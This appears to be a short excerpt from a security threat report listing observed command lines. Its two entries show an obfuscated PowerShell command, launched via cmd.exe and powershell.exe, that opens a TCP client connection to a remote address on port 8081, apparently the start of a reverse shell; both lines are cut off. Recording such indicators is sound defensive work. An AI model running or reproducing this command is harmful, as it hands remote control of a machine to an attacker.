Technical Information
- '<SYSTEM32>\cmd.exe' /c powershell "&('sE'+'T') 4`2q ( [TyPE](\"{1}{0}{2}\" -F '.EnCODin','text','g') ) ; $client = .('N'+'ew-Objec'+'t') SyS`TEm.`N`Et.sOCkE`T`S.Tc`PC`LieNT((\"{1}{3}{0}{4}{2}\" -f '8','172','...
- '17#.#8.15.26':8081
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "&('sE'+'T') 4`2q ( [TyPE](\"{1}{0}{2}\" -F '.EnCODin','text','g') ) ; $client = .('N'+'ew-Objec'+'t') SyS`TEm.`N`Et.sOCkE`T`S.Tc`PC`LieNT((\"{1}{3}{0}{4}{2}\" -f '8','172','.26','.1','.15'...